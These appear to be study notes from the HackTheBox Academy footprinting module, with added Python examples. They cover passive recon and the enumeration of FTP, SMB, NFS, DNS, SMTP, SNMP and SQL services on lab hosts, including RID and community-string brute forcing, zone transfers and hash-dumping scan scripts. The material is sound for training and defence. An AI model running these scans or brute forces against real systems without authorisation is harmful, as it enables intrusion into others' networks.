HackTheBox Academy - Footprinting

Updated 29-03-2026

Intro

Footprinting is information gathering using active (scans) and passive (use of third-party providers) methods.

Enumeration Methodology

Infrastructure Based Enumeration

Domain Information

passively gathering information to understand the company better.

getting a first impression of its presence on the internet from its SSL/TLS certificate

another source to find more subdomains is crt.sh (certificate transparency logs)

# output results in JSON format from crt.sh
curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq .

# filter results by unique subdomain
curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u

# identify hosts directly accessible from the internet
for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done
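Added example (not from the HTB module or these notes): the crt.sh pipeline above works on the raw JSON with grep/cut; the Python below does the same job on the parsed structure, so wildcard entries, mixed case and look-alike domains that merely contain the target name are handled explicitly. The JSON sample inside is constructed to mimic the shape of crt.sh's output (`common_name`, `name_value`, `issuer_name`); the hostnames and issuers in it are assumptions.

```python
import json

# Constructed sample in the shape of crt.sh's JSON output (not a real query
# result): each entry carries a "common_name" and a newline-separated
# "name_value" field, which is why the one-liner on the page splits on "\n".
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.inlanefreight.com",
     "name_value": "inlanefreight.com\nwww.inlanefreight.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "*.inlanefreight.com",
     "name_value": "*.inlanefreight.com\nmail.inlanefreight.com\nvpn.inlanefreight.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "Mail.Inlanefreight.com",
     "name_value": "mail.inlanefreight.com"},
    # A look-alike domain that contains the target name but is not part of it
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "inlanefreight.com.example-lookalike.net",
     "name_value": "inlanefreight.com.example-lookalike.net"},
])


def extract_subdomains(crtsh_json: str, domain: str) -> list[str]:
    """Return the sorted, unique hostnames from crt.sh JSON that belong to `domain`.

    Compared with a grep/cut pipeline: names are case-folded, the wildcard
    prefix '*.' is stripped, and only names equal to the domain or ending in
    '.<domain>' are kept, so look-alike domains are excluded.
    """
    domain = domain.lower()
    suffix = "." + domain
    found = set()
    for entry in json.loads(crtsh_json):
        candidates = entry.get("name_value", "").split("\n")
        candidates.append(entry.get("common_name", ""))
        for raw in candidates:
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith(suffix):
                found.add(name)
    return sorted(found)


def wildcard_issuers(crtsh_json: str, domain: str) -> dict[str, str]:
    """Map each wildcard certificate name under `domain` to its issuer.

    A wildcard in the transparency logs tells a defender that every host under
    that label shares one key, which matters when scoping a certificate review.
    """
    domain = domain.lower()
    wildcards = {}
    for entry in json.loads(crtsh_json):
        cn = entry.get("common_name", "").lower()
        if cn.startswith("*.") and cn.endswith("." + domain):
            wildcards[cn] = entry.get("issuer_name", "")
    return wildcards


if __name__ == "__main__":
    for host in extract_subdomains(SAMPLE_CRTSH_JSON, "inlanefreight.com"):
        print(host)
    print(wildcard_issuers(SAMPLE_CRTSH_JSON, "inlanefreight.com"))
```

Replace `SAMPLE_CRTSH_JSON` with the body returned by the `curl` call above to run it against real data; the suffix check is what keeps unrelated certificates that happen to mention the company name out of the host list.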

Shodan can be used to find devices and systems permanently connected to the internet

for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f4 >> ip-addresses.txt;done

for i in $(cat ip-addresses.txt);do shodan host $i;done

see all available DNS records

dig any inlanefreight.com

Cloud Resources

# ip lookup
for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done

cloud storage can also be found via DNS; during an IP lookup it is possible to find an IP that belongs to a cloud provider

using Google dorks we can find cloud storage with inurl:amazonaws.com intext:companyname for AWS and inurl:blob.core.windows.net intext:companyname for Azure

web page source code can also reference cloud storage

domain.glass can tell us about the company’s infrastructure

GrayHatWarfare supports different searches and can discover cloud storage, files and SSH keys

Staff

employees can be identified on business networks like LinkedIn, Xing, etc.

from job posts we can tell what technologies the company uses (Java, MySQL, Flask, etc.)

from employee profiles, we can get links to personal projects, GitHub pages, etc.

from technical employees' profiles we can also infer the infrastructure and technology the company is likely using

Host Based Enumeration

FTP

FTP runs at the application layer

for an FTP connection, client and server first establish a control channel on port 21: the client sends commands to the server and the server returns status codes; the participants then establish a data channel on port 20

  • FTP can be in active and passive mode

    • in active, when client establishes connection it also informs the server via which client side port the server can transmit the response (less secure because client has to open ports)
    • in passive, the server announces a port through which the client can establish the data channel
  • TFTP
    TFTP (Trivial FTP) is simpler than FTP, uses UDP instead of TCP and doesn’t require user authentication

the most used FTP server on Linux distros is vsFTPd and its config can be found in /etc/vsftpd.conf; some settings are predefined by default

  • Dangerous settings:
    anonymous_enable=YES
    anon_upload_enable=YES
    anon_mkdir_write_enable=YES
    no_anon_password=YES
    anon_root=/home/username/ftp
    write_enable=YES

  • Anonymous Login / Status / Detailed Output

# anonymous login
ftp 10.129.14.136

# overview of server's settings
status

# show us more information
debug
trace
  • Footprinting
    # list nmap ftp scripts 
    find / -type f -name ftp* 2>/dev/null | grep scripts

    # nmap scan using version scan (-sV), aggressive scan (-A), and the default script scan (-sC)
    sudo nmap -sV -p21 -sC -A 10.129.14.136

    # service interaction
    nc -nv 10.129.14.136 21
    telnet 10.129.14.136 21

    # ftp server with TLS/SSL
    openssl s_client -connect 10.129.14.136:21 -starttls ftp

SMB

is a client-server protocol for sharing files, printers and other network resources for Windows systems

  • Samba is an alternative implementation of SMB for Unix operating systems which uses the Common Internet File System (CIFS) network protocol
  • default configuration can be found at /etc/samba/smb.conf
cat /etc/samba/smb.conf | grep -v "#\|\;" 
  • Dangerous Settings:
    browseable = yes
    read only = no
    writable = yes
    guest ok = yes
    enable privileges = yes
    create mask = 0777
    directory mask = 0777
    logon script = script.sh
    magic script = script.sh
    magic output = script.out

  • Footprinting

    # list shares
    smbclient -N -L //10.129.14.128

    # connect to share
    smbclient //10.129.14.128/notes

    # download from share
    get prep-prod.txt

    # !<cmd> to execute local system commands
    !ls

    # on smb server to see status
    smbstatus

    # nmap scan services
    sudo nmap 10.129.14.128 -sV -sC -p139,445

    # we can use tools like rpcclient to perform MS-RPC functions
    rpcclient -U "" 10.129.14.128

    # rpcclient - enum
    srvinfo
    enumdomains
    querydominfo
    netshareenumall
    netsharegetinfo <share>
    enumdomusers
    queryuser <RID>

    # rpcclient - user enum
    enumdomusers
    queryuser 0x3e9

    # rpcclient - group info
    querygroup 0x201

    # brute force user RIDs
    for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

    # alternative to brute-forcing: the Impacket script samrdump.py
    samrdump.py 10.129.14.128

    # info we obtained from rpc client can be obtained using:
    # SMBMap and CrackMapExec
    smbmap -H 10.129.14.128

    crackmapexec smb 10.129.14.128 --shares -u '' -p ''

    # older tool, enum4linux
    # automates many of the queries, but not all
    ./enum4linux-ng.py 10.129.14.128 -A

NFS

serves the same purpose as SMB for Linux and Unix systems

the protocol itself has no authentication or authorization; the RPC layer is used for authentication and authorization is derived from file system information

the most common authentication is via UNIX UID/GID and group memberships

/etc/exports contains the table of local filesystems that the NFS server exports to clients; the default file also contains example entries for configuring NFS shares

Dangerous Settings

  • rw

  • insecure

  • nohide

  • no_root_squash

  • Footprinting

    sudo nmap 10.129.14.128 -p111,2049 -sV -sC

    # nmap with NFS scripts
    sudo nmap --script nfs* 10.129.14.128 -sV -p111,2049

    # show available NFS shares
    showmount -e 10.129.14.128

    # create empty folder to mount the share
    # mount share to folder
    mkdir target-NFS
    sudo mount -t nfs 10.129.14.128:/ ./target-NFS/ -o nolock
    cd target-NFS
    tree .

    # we can get access by creating the same usernames, group names, UIDs and GIDs on our system to view and modify the files
    # list contents with user and group names
    ls -l mnt/nfs/
    # list contents with UIDs and GIDs
    ls -n mnt/nfs/

    # unmount
    cd ..
    sudo umount ./target-NFS

    # if root_squash is set we cannot edit even as root
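Added example (not from the HTB module or these notes): an /etc/exports auditor that parses the exports(5) syntax and reports the four options listed under "Dangerous Settings" above, marking the ones granted to everyone (`*` or a very wide network), which is the combination that lets any client mount the share as root when no_root_squash is present. The exports file inside is constructed; the paths and networks are assumptions.

```python
import ipaddress

# Constructed sample /etc/exports (not taken from the page or any real host).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/srv/backup      10.129.14.0/24(rw,sync,no_subtree_check,root_squash)
/srv/share       *(rw,sync,no_root_squash,insecure)
/home/public     192.168.1.0/24(ro,sync,nohide)
/mnt/data        10.129.14.128(rw,sync) 10.129.14.129(ro)
"""

# The options this section lists as dangerous, with the reason to report.
RISKY_OPTIONS = {
    "rw": "export is writable for this client",
    "insecure": "requests from unprivileged source ports are accepted, so any local user on the client can speak NFS as any UID",
    "nohide": "filesystems mounted below the export are exposed as well",
    "no_root_squash": "remote root keeps UID 0 instead of being mapped to nobody",
}


def parse_exports(text):
    """Return a list of (path, client, [options]) tuples, one per client spec.

    exports(5) syntax: `<path> <client>(<opts>) <client>(<opts>) ...`; a client
    with no parenthesised options gets the defaults (ro, root_squash, secure).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        for spec in rest.split():
            client, _, opts = spec.partition("(")
            options = [o.strip() for o in opts.rstrip(")").split(",") if o.strip()]
            entries.append((path, client, options))
    return entries


def is_wide_open(client):
    """True when the client spec grants access to everyone (or nearly so)."""
    if client in ("*", ""):
        return True
    try:
        return ipaddress.ip_network(client, strict=False).prefixlen <= 8
    except ValueError:
        return False  # hostnames and netgroups are treated as scoped


def audit_exports(text):
    """Return one finding per risky option; `everyone` marks world-reachable ones."""
    findings = []
    for path, client, options in parse_exports(text):
        for opt in options:
            if opt in RISKY_OPTIONS:
                findings.append({
                    "path": path,
                    "client": client,
                    "option": opt,
                    "everyone": is_wide_open(client),
                    "reason": RISKY_OPTIONS[opt],
                })
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        flag = "EVERYONE " if f["everyone"] else ""
        print(f"{flag}{f['path']} {f['client']} {f['option']}: {f['reason']}")
```

Note that `root_squash` and `secure` are the defaults, so only their explicit negations (`no_root_squash`, `insecure`) ever appear in the file; the auditor does not need to look for the safe values.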

DNS

  • is used to resolve domain names to IP addresses
  • types of DNS servers:
    • DNS root server
    • Authoritative name server
    • Non-authoritative name server
    • Caching server
    • Forwarding server
    • Resolver
  • DNS queries are unencrypted by default but can be encrypted using DoT, DoH or DNSCrypt network protocol
  • it stores information about services associated with the domain like mail server, etc
  • different DNS records are used for DNS queries:
    • A: returns an IPv4 address of the requested domain
    • AAAA: returns an IPv6 address of the requested domain
    • MX: returns the responsible mail servers
    • NS: returns the DNS servers (nameservers) of the domain
    • TXT: can contain various information
    • CNAME: serves as an alias for another domain name
    • PTR: works the other way around (reverse lookup), converting IP addresses into valid domain names
    • SOA: provides information about the corresponding DNS zone and the email address of the administrative contact
  • all DNS servers work with 3 different types of config files:

    1. local DNS configuration files
    2. zone files
    3. reverse name resolution files
  • Bind9 server is often used on Linux based distros; the local config file named.conf is divided into:

    • named.conf.local
    • named.conf.options
    • named.conf.log
  • zones are divided into individual files; each zone file describes one zone completely and is found at e.g. /etc/bind/db.domain.com

  • reverse name resolution zone files are used for PTR records to map IP address to FQDN; found in /etc/bind/db.10.129.14

  • dangerous settings:

    • allow-query
    • allow-recursion
    • allow-transfer
    • zone-statistics
  • Footprinting
    # query NS using specific DNS server with @
    dig ns inlanefreight.htb @10.129.14.128

    # query the server version (CHAOS-class TXT record version.bind)
    dig CH TXT version.bind @10.129.120.85

    # query all records
    dig any inlanefreight.htb @10.129.14.128

    # AXFR zone transfer
    dig axfr inlanefreight.htb @10.129.14.128

    # AXFR zone transfer - internal
    dig axfr internal.inlanefreight.htb @10.129.14.128

    # subdomain brute force
    for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

    # enumerate subdomains using DNSEnum
    dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
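Added example (not from the HTB module or these notes), written from the server side: the three probes in this section (AXFR zone transfer, the CHAOS-class version.bind query, and a wordlist run that resolves many names from one client) each leave a distinctive trace in a BIND query log, and the script below parses such lines and flags them. The log lines are constructed to follow the shape of BIND 9's querylog channel (`client [@0x...] IP#port (qname): query: name class type flags (server)`); the addresses and names are assumptions. The corresponding hardening in named.conf is `allow-transfer` restricted to secondaries and a `version` option in the `options` block so version.bind returns nothing useful.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape of a BIND 9 query log (the "querylog"
# channel); not taken from the page or from any real server.
SAMPLE_QUERY_LOG = """\
client 10.129.14.1#39281 (inlanefreight.htb): query: inlanefreight.htb IN AXFR -E(0)T (10.129.14.128)
client 10.129.14.1#39282 (internal.inlanefreight.htb): query: internal.inlanefreight.htb IN AXFR -E(0)T (10.129.14.128)
client 10.129.14.1#39283 (version.bind): query: version.bind CH TXT -E(0) (10.129.14.128)
client 10.129.14.50#51000 (www.inlanefreight.htb): query: www.inlanefreight.htb IN A +E(0) (10.129.14.128)
client 10.129.14.50#51001 (mail.inlanefreight.htb): query: mail.inlanefreight.htb IN MX +E(0) (10.129.14.128)
client @0x7f0e3c0a1b60 10.129.14.1#39290 (admin.inlanefreight.htb): query: admin.inlanefreight.htb IN A + (10.129.14.128)
client @0x7f0e3c0a1b60 10.129.14.1#39291 (dev.inlanefreight.htb): query: dev.inlanefreight.htb IN A + (10.129.14.128)
client @0x7f0e3c0a1b60 10.129.14.1#39292 (test.inlanefreight.htb): query: test.inlanefreight.htb IN A + (10.129.14.128)
client @0x7f0e3c0a1b60 10.129.14.1#39293 (staging.inlanefreight.htb): query: staging.inlanefreight.htb IN A + (10.129.14.128)
client @0x7f0e3c0a1b60 10.129.14.1#39294 (vpn.inlanefreight.htb): query: vpn.inlanefreight.htb IN A + (10.129.14.128)
"""

# Newer BIND versions insert a "@0x..." client handle; older ones do not.
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<name>\S+) (?P<cls>\S+) (?P<type>\S+)"
)


def parse_query_log(text):
    """Return (client_ip, qname, qclass, qtype) for each line that matches."""
    records = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            records.append((m["ip"], m["name"].lower(), m["cls"], m["type"]))
    return records


def analyze_query_log(text, enum_threshold=5):
    """Flag the footprinting patterns from this section:
       - AXFR/IXFR requests (zone transfer attempts)
       - CHAOS-class version.bind / hostname.bind probes
       - one client resolving many distinct names (wordlist enumeration)
    """
    axfr, probes = [], []
    names_per_client = defaultdict(set)
    for ip, name, cls, qtype in parse_query_log(text):
        if qtype in ("AXFR", "IXFR"):
            axfr.append((ip, name))
        elif cls == "CH" and name in ("version.bind", "hostname.bind"):
            probes.append((ip, name))
        elif qtype in ("A", "AAAA"):
            names_per_client[ip].add(name)
    enumeration = {ip: len(names) for ip, names in names_per_client.items()
                   if len(names) >= enum_threshold}
    return {"axfr": axfr, "version_probes": probes, "enumeration": enumeration}


if __name__ == "__main__":
    for kind, hits in analyze_query_log(SAMPLE_QUERY_LOG).items():
        print(kind, hits)
```

In production the enumeration count would be taken over a time window rather than a whole file; the threshold of five distinct A/AAAA names per client is an assumption chosen for the sample and would be tuned to the zone's normal traffic.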

SMTP

  • Simple Mail Transfer Protocol is a protocol for sending emails; used between an email client and an outgoing server or between two SMTP servers

  • is often combined with IMAP or POP3 protocols

  • it is unencrypted, transmits all data in plaintext and uses port 25

  • newer SMTP servers (ESMTP) are encrypted with SSL/TLS and use port 465 or 587; AUTH PLAIN is used for authentication

  • mail workflow:
    Client (MUA)➞Submission Agent (MSA)➞Open Relay (MTA) ➞Mail Delivery Agent (MDA) ➞ Mailbox (POP3/IMAP)

  • default config can be found in /etc/postfix/main.cf

  • interacting with an SMTP server:

    # connect to a server
    telnet 10.129.14.128 25

    # init a session
    HELO mail1.inlanefreight.htb

    # VRFY can be used to enumerate users
    # the server may answer with code 252 and "confirm" the existence of a user that doesn't exist
    VRFY root
    VRFY username

    # send an email
    MAIL FROM: <cry0l1t3@inlanefreight.htb>

    RCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure


    DATA

    From: <cry0l1t3@inlanefreight.htb>
    To: <mrb3n@inlanefreight.htb>
    Subject: DB
    Date: Tue, 28 Sept 2021 16:32:51 +0200
    Hey man, I am trying to access our XY-DB but the creds dont work.
    Did you make any changes there?

    # terminate session
    QUIT
  • dangerous settings:

    • open relay config: mynetworks = 0.0.0.0/0 - the server accepts mail from anyone and can be used to send fake emails and initiate communication between multiple parties; an attacker can also spoof an email and read it
  • Footprinting

    # default nmap script includes smtp-commands
    sudo nmap 10.129.14.128 -sC -sV -p25

    # to identify the SMTP target as open relay
    sudo nmap 10.129.14.128 -p25 --script smtp-open-relay
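Added example (not from the HTB module or these notes) covering the telnet session above and the open-relay setting: a small, hypothetical in-memory model of an SMTP server's command handling. It shows both sides of the exchange, why `mynetworks = 0.0.0.0/0` makes a relay open while a scoped range does not, and why a `252` answer to VRFY tells an enumerator nothing. The class, its `mynetworks`/`vrfy_mode` parameters and the reply texts are this example's own (modelled on Postfix's behaviour, not Postfix code); the addresses and users are assumptions.

```python
import ipaddress
import re

ADDR_RE = re.compile(r"<([^>]+)>")

# The session from the page, as a constructed client-side transcript.
PAGE_SESSION = [
    "HELO mail1.inlanefreight.htb",
    "VRFY root",
    "VRFY nosuchuser",
    "MAIL FROM: <cry0l1t3@inlanefreight.htb>",
    "RCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure",
    "DATA",
    "Subject: DB",
    "",
    "Hey man, I am trying to access our XY-DB but the creds dont work.",
    ".",
    "QUIT",
]


class MiniSmtpServer:
    """In-memory model of an SMTP server's command handling (hypothetical, not
    Postfix). `mynetworks` plays the role of Postfix's mynetworks parameter:
    clients inside those ranges may relay to any destination; everyone else may
    only deliver to the local domain."""

    def __init__(self, local_domain, mynetworks, known_users, vrfy_mode="noncommittal"):
        self.local_domain = local_domain.lower()
        self.mynetworks = [ipaddress.ip_network(n, strict=False) for n in mynetworks]
        self.known_users = {u.lower() for u in known_users}
        self.vrfy_mode = vrfy_mode  # "strict" (leaks users), "noncommittal" (252), "disabled"

    def is_open_relay(self):
        """mynetworks = 0.0.0.0/0 (or ::/0) trusts every client: an open relay."""
        return any(net.prefixlen == 0 for net in self.mynetworks)

    @staticmethod
    def _address(arg):
        m = ADDR_RE.search(arg)
        return (m.group(1) if m else arg.split(":", 1)[-1].split()[0]).lower()

    def _vrfy(self, user):
        if self.vrfy_mode == "disabled":
            return "502 5.5.1 VRFY command is disabled"
        if self.vrfy_mode == "strict":
            return f"250 2.1.5 {user}" if user in self.known_users else f"550 5.1.1 {user}: user unknown"
        # 252 neither confirms nor denies the user, which is why a 252 for a
        # name that does not exist proves nothing about the account list.
        return f"252 2.0.0 {user}"

    def session(self, client_ip, lines):
        """Feed client lines in order; return one reply per command. Lines between
        DATA and the terminating '.' are message body and get no reply."""
        trusted = any(ipaddress.ip_address(client_ip) in net for net in self.mynetworks)
        replies, in_data = [], False
        for line in lines:
            if in_data:
                if line == ".":
                    in_data = False
                    replies.append("250 2.0.0 Ok: queued")
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                replies.append(f"250 mail1.{self.local_domain}")
            elif verb == "VRFY":
                replies.append(self._vrfy(arg.strip().lower()))
            elif verb == "MAIL":
                replies.append("250 2.1.0 Ok")
            elif verb == "RCPT":
                rcpt_domain = self._address(arg).rpartition("@")[2]
                if rcpt_domain == self.local_domain or trusted:
                    replies.append("250 2.1.5 Ok")
                else:
                    replies.append("554 5.7.1 Relay access denied")
            elif verb == "DATA":
                in_data = True
                replies.append("354 End data with <CR><LF>.<CR><LF>")
            elif verb == "QUIT":
                replies.append("221 2.0.0 Bye")
            else:
                replies.append("502 5.5.2 Error: command not recognized")
        return replies


if __name__ == "__main__":
    scoped = MiniSmtpServer("inlanefreight.htb", ["127.0.0.0/8", "10.129.14.0/24"], ["root", "mrb3n"])
    for reply in scoped.session("10.129.14.50", PAGE_SESSION):
        print("S:", reply)
```

The relay decision is the whole point: a recipient outside the local domain is accepted only when the client sits inside `mynetworks`, so the scoped server answers an outside client's foreign RCPT with `554`, while the `0.0.0.0/0` server answers `250` and will forward anything, which is what nmap's `smtp-open-relay` script above tests for.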

IMAP / POP3

  • Internet Message Access Protocol (IMAP) is used to access emails from a mail server; it allows online management of emails and supports folder structures
  • Post Office Protocol (POP3) only provides listing, retrieving and deleting emails as function
  • IMAP is unencrypted by default and uses port 143; can be encrypted with SSL/TLS on port 993
  • POP3 uses port 110 by default and can be encrypted with SSL/TLS on port 995
  • dangerous settings:
    • auth_debug
    • auth_debug_passwords
    • auth_verbose
    • auth_verbose_passwords
    • auth_anonymous_username
  • Footprinting
    sudo nmap 10.129.14.128 -sV -p110,143,993,995 -sC

    # login to the mail server with credentials
    curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd

    # with verbose, to see version of TLS, SSL certificate, banner, and version of the mail server
    curl -k 'imaps://10.129.14.128' --user cry0l1t3:1234 -v


    # we can use openssl or ncat to interact with IMAP or POP3 over SSL
    openssl s_client -connect 10.129.14.128:pop3s

    openssl s_client -connect 10.129.14.128:imaps

SNMP

  • Simple Network Management Protocol (SNMP) is used to monitor network devices, configure tasks and change settings remotely
  • the client can transmit control commands to the server using agents on UDP port 161
  • SNMP can also enable traps over UDP 162 which sends data packets from the SNMP server to the client without being requested
  • MIB contains at least one Object Identifier (OID) which contains unique address and a name, also contains information about type, access rights and description of the SNMP object
  • OIDs represent nodes in a hierarchical namespace and are identified by a unique sequence of numbers and usually concatenated by dot notations
  • SNMPv1 supports information retrieval and configuration of network devices; it has no built-in authentication mechanism and no encryption
  • SNMPv2 has several versions but ‘v2c’ is the most common; it is extended with additional functions; the community string (which provides the only access control) is transmitted in plain text; no encryption
  • SNMPv3 adds security features such as authentication using username and password and encryption of the transmitted data (via a pre-shared key)
  • default configuration can be found at /etc/snmp/snmpd.conf
  • dangerous settings:
    • rwuser noauth
    • rwcommunity <community string> <IPv4 address>
    • rwcommunity6 <community string> <IPv6 address>
  • Footprinting
    # query the OIDs with their information
    snmpwalk -v2c -c public 10.129.14.128

    # brute-force names of the community string
    onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt 10.129.14.128

    # brute-force individual OIDs and enumerate the information behind them
    # we need to know a community string first
    sudo apt install braa
    braa <community string>@<IP>:.1.3.6.* # Syntax
    braa public@10.129.14.128:.1.3.6.*
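Added example (not from the HTB module or these notes) for the OID bullets above: a parser for `snmpwalk` output that turns dotted OIDs into numeric tuples, orders them the way the MIB tree does (numerically, so `...9.1.2.2` precedes `...9.1.2.10`, which a plain text sort gets wrong), implements the subtree test behind a braa-style pattern such as `.1.3.6.*`, and buckets results by well-known subtree so the `system` group (OS build, contact address, location) stands out in a review. The walk output inside is constructed in net-snmp's `iso.` notation; the values are assumptions.

```python
import re

# Constructed snmpwalk output (net-snmp prints "iso." when no MIBs are loaded);
# not taken from the page or any real device.
SAMPLE_SNMPWALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux htb 5.4.0-90-generic #101-Ubuntu SMP x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (12345) 0:02:03.45
iso.3.6.1.2.1.1.4.0 = STRING: "mrb3n@inlanefreight.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "htb"
iso.3.6.1.2.1.1.6.0 = STRING: "Server room, rack 3"
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (98765) 0:16:27.65
iso.3.6.1.2.1.2.2.1.2.1 = STRING: "lo"
iso.3.6.1.2.1.2.2.1.2.2 = STRING: "eth0"
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
"""

WALK_LINE = re.compile(r"^(?P<oid>\S+) = (?:(?P<type>[\w-]+): )?(?P<value>.*)$")

# Well-known subtrees of the OID hierarchy; the tuple is the numeric prefix.
SUBTREES = {
    (1, 3, 6, 1, 2, 1, 1): "system",           # sysDescr, sysContact, sysName, sysLocation
    (1, 3, 6, 1, 2, 1, 2): "interfaces",
    (1, 3, 6, 1, 2, 1, 25): "host-resources",  # processes, installed software, storage
    (1, 3, 6, 1, 4, 1): "enterprises",         # vendor-specific
}


def oid_to_tuple(oid):
    """'.1.3.6.1.2.1.1.5.0' or 'iso.3.6.1.2.1.1.5.0' -> (1, 3, 6, 1, 2, 1, 1, 5, 0)."""
    oid = oid.strip().lstrip(".")
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    return tuple(int(part) for part in oid.split("."))


def tuple_to_oid(parts):
    return "." + ".".join(str(p) for p in parts)


def is_under(oid, prefix):
    """True when `oid` lies in the subtree rooted at `prefix` (both tuples);
    this is the check behind a pattern such as braa's '.1.3.6.*'."""
    return oid[:len(prefix)] == prefix


def parse_snmpwalk(text):
    """Return [(oid_tuple, type, value)] in numeric OID order.

    Sorting the tuples rather than the strings is what makes '...9.1.2.2'
    come before '...9.1.2.10'; a lexical sort would reverse them.
    """
    records = []
    for line in text.splitlines():
        m = WALK_LINE.match(line.strip())
        if m:
            value = m["value"].strip().strip('"')
            records.append((oid_to_tuple(m["oid"]), m["type"] or "", value))
    return sorted(records, key=lambda r: r[0])


def group_by_subtree(records):
    """Bucket walk results by well-known subtree for a readable report."""
    groups = {}
    for oid, _type, value in records:
        label = next((name for prefix, name in SUBTREES.items() if is_under(oid, prefix)), "other")
        groups.setdefault(label, []).append((tuple_to_oid(oid), value))
    return groups


if __name__ == "__main__":
    for label, items in group_by_subtree(parse_snmpwalk(SAMPLE_SNMPWALK)).items():
        print(label)
        for oid, value in items:
            print(f"  {oid} = {value}")
```

Run it on a real `snmpwalk -v2c -c <community> <host>` capture to see at a glance which subtrees a read-only community exposes; sysContact and sysLocation in particular are often filled in with data an organisation would not publish elsewhere.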

MySQL

  • MySQL is an opensource SQL relational database management system
  • databases are stored in a single .sql file
  • clients can retrieve and edit data using SQL based language queries
  • default configuration can be found at /etc/mysql/mysql.conf.d/mysqld.cnf
  • dangerous settings:
    • user
    • password
    • admin_address
    • debug
    • sql_warnings
    • secure_file_priv
  • Footprinting
    # nmap using mysql scripts
    sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

    # login to mysql server
    mysql -u root -pP4SSw0rd -h 10.129.14.128

    # queries
    show databases;

    select version();

    use mysql;

    show tables;

    show columns from <table>;

    select * from <table>;

    select * from <table> where <column> = "<string>";

MSSQL

  • is Microsoft’s SQL-based relational database management system
  • mostly used on Windows operating systems
  • SQL Server Management Studio is usually used to manage the databases
  • many clients can be used to access databases running on MSSQL, like:
    • mssql-cli
    • SQL Server Powershell
    • HeidiSQL
    • SQLPro
    • impacket-mssqlclient
  • dangerous settings:
    • not using encryption when connecting to MSSQL server
    • using self-signed certificates
    • using named pipes
    • weak and default sa credentials
  • Footprinting
    # nmap mssql script scan
    sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

    # mssql ping in metasploit
    msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248

    msf6 auxiliary(scanner/mssql/mssql_ping) > run

    # connecting with mssqlclient
    impacket-mssqlclient Administrator@10.129.201.248 -windows-auth

    select name from sys.databases


Oracle TNS

  • Oracle TNS (Transparent Network Substrate) is a server that facilitates communication between Oracle databases and applications over networks
  • the listener uses port TCP/1521 by default, and supports IPX/SPX, UDP and AppleTalk
  • has built-in encryption mechanisms and supports IPv6 and SSL/TLS encryption
  • the configuration files are called tnsnames.ora and listener.ora and are located at $ORACLE_HOME/network/admin
  • Oracle 9 has a default password CHANGE_ON_INSTALL, and the DBSNMP service uses the default password dbsnmp
  • packages and tools to enumerate TNS listener and interact with it:
sudo apt-get update
sudo apt-get install -y build-essential python3-dev libaio1
cd ~
wget https://files.pythonhosted.org/packages/source/c/cx_Oracle/cx_Oracle-8.3.0.tar.gz
tar xzf cx_Oracle-8.3.0.tar.gz
cd cx_Oracle-8.3.0
python3 setup.py build
sudo python3 setup.py install
cd ~
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip install python-libnmap
git submodule init
git submodule update
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
  • testing ODAT (ODAT is a pentesting tool designed to enumerate and exploit vulnerabilities in Oracle databases)
./odat.py -h
  • Footprinting
